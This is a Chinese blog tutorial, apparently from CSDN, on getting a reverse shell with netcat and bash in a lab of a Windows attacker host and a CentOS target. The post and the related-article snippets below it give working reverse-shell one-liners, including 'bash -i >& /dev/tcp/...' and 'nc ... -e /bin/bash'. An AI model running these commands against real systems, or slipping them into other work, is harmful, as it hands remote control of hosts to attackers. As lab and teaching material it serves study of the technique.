利用NC反弹shell

原创 已于 2025-01-17 18:08:14 修改 · 675 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux

于 2025-01-17 18:01:23 首次发布

一、什么是反弹shell?

反弹shell(reverse shell),就是控制端(攻击者所有)监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转发到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念上的客户端与服务端的角色反转。

就我个人对反弹shell的理解是:

在Linux中的shell是指一个面向用户的命令接口,也就是一个命令解析器。用户可以通过在shell上键入命令来达到操作主机的目的。正常情况下shell只能由主机的用户使用,但是反弹shell的目的则是将自己的shell反弹给别的主机,让别的主机可以通过shell来控制自己。

二、为什么要反弹shell?

至于为什么要反弹shell,那是被控端可能因防火墙受限、权限不足、端口被占用等情形导致攻击者无法直接对目标进行控制。

举例:假设我们攻击了一台主机,打开了该主机的一个端口,攻击者在自己的主机上去连接目标机器(目标ip:目标机器端口),这是比较常规的方式,叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能使用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.目标主机的ip是动态改变的,不能持续控制。

3.由于防火墙等限制,目标主机只能发送请求,不能接收请求。

4.对于病毒、木马,受害者什么时候能中招、对方的网络环境是什么样的、什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是最好的办法。

那么反弹就很好理解了,攻击者指定服务端,目标主机主动连接攻击者的服务端程序,就叫反弹连接。这里的反弹shell就属于反弹连接。

三、实验环境

windows11(攻击者):192.169.29.233

Centos 7(攻击目标):192.168.204.100

四、使用bash命令反弹shell

反弹shell命令格式如下:

bash -i >& /dev/tcp/ip/port 0>&1

(1)攻击者本地监听12666端口

(2)目标主机执行反弹shell命令

bash -i >& /dev/tcp/192.169.29.233/12666 0>&1

执行完成之后再看我们的攻击者主机可以发现目标的shell已经反弹过来了

kali使用nc正向反弹windows shell
09-12 2085
3.kali主机运行终端 并输入 nc 192.168.31.201 8888 回车后,将反弹windows系统shell到Kali终端。2.查看windows系统IP并运行ncat监听8888端口。现在可通过这个shell对windows系统进行任何操作。1.下载 ncat.exe 并上传到windows。
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 2442
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
LinuxNC反弹shell命令(推荐)
09-15
主要介绍了LinuxNC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
渗透测试常用反弹shell方法(如何渗透测试反弹shell)—Windows篇渗透测试!
最新发布
qq_41314882的博客
10-20 1136
反弹Shell是一种让攻击者远程控制目标主机的技术,分为正向反弹(控制端连接目标)和反向反弹(目标主动连接控制端)。常用工具有NetCat(NC)、mshta.exe和rundll32.exe。NC反弹需要上传工具到目标主机,通过监听端口实现控制。mshta.exe利用HTA文件执行恶意脚本,可通过Metasploit或Cobalt Strike生成木马文件。rundll32.exe则通过调用DLL文件实现攻击,需配合Metasploit模块使用。反向反弹能绕过防火墙限制,是更常用的方法。这些技术可帮助渗透
内网渗透:nc反弹shell总结
安全大白
01-03 6746
1、实验环境 Kali:192.168.32.132 //模拟靶机 Windows:192.168.32.1 //模拟公网vps 2、若靶机上存在nc,获取反向shell: vps攻击机:nc -lvp 9999 // 监听9999端口 靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows 3、若
nc--反弹shell
wzhua的博客
08-04 3427
nc--反弹shell,小实验
NC反弹shell
Palpitate_LL的博客
09-13 1296
c 指定连接后要执行的shell命令-e 指定连接后要执行的文件名-l 监听模式-p 设置本地使用的通信端口-u 使用UDP传输协议,默认是TCP-v 显示命令执行过程,使用-vv显示更详细信息。
反弹shell的方式——之NC反弹shell
aihua002的博客
07-24 990
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
NC反弹Shell
收集盒 Book box
08-30 3063
使用NC反弹Shell 在进行Shell反弹时,有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况,例如有的服务器只支持JSP,不支持PHP。此时,可以同样采用Windows下的经典的NC反弹Shell方法。 在Windows下反弹CmdSh
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 2629
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
nc的使用+反弹shell
2301_80366980的博客
02-18 1886
记录学习linuxnc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
[保姆级教程]-通过NC反弹shell实战
qq_43681532的博客
02-19 559
环境工具步骤。
Windows/Linuxnc 反弹shell
热门推荐
SoulCat
06-11 1万+
*Windows/Linuxnc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
NC反弹shell的几种方法
qq_59350385的博客
05-12 1万+
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
使用nc反弹shell方法
baidu_33260220的博客
05-08 6713
hacker机:192.168.1.1 目标机:192.168.1.2 1、在hacker机执行 nc -vlp 9999  (监听本机9999端口) 2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1 成功反弹shell
使用 `nc` (netcat) 进行 shell 反弹
suanfa_student的博客
02-15 287
ncnc
NC 反弹shell
08-30
NC反弹shell是一种利用NetCat工具实现的一种技术,用于在目标机器和控制机器之间建立一个反向连接,并获得对目标机器的控制权。在反弹shell中,目标机器先执行NC命令,将shell连接到控制机器上的NC监听端口,从而使控制机器能够控制目标机器。 有几种方法可以实现NC反弹shell。其中一种是使用bash反弹,命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意,这种方法需要在控制机器上执行。 另一种方法是使用NC命令进行反向连接,命令如下: ``` nc -e /bin/bash 192.168.0.4 7777 ``` 这种方法适用于在CentOS或Ubuntu上使用。 还有一种方法是使用php反弹shell,需要目标机器安装NC。命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 同样,这种方法需要在控制机器上执行。 总而言之,NC反弹shell是一种通过建立反向连接实现对目标机器的控制的技术。可以使用不同的方法来实现反弹shell,如bash反弹和php反弹。这些方法需要根据具体情况和系统进行选择和执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [详解NC反弹shell的几种方法](https://download.csdn.net/download/weixin_38664159/14048091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NC反弹shell的几种方法](https://blog.csdn.net/qq_59350385/article/details/124733038)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值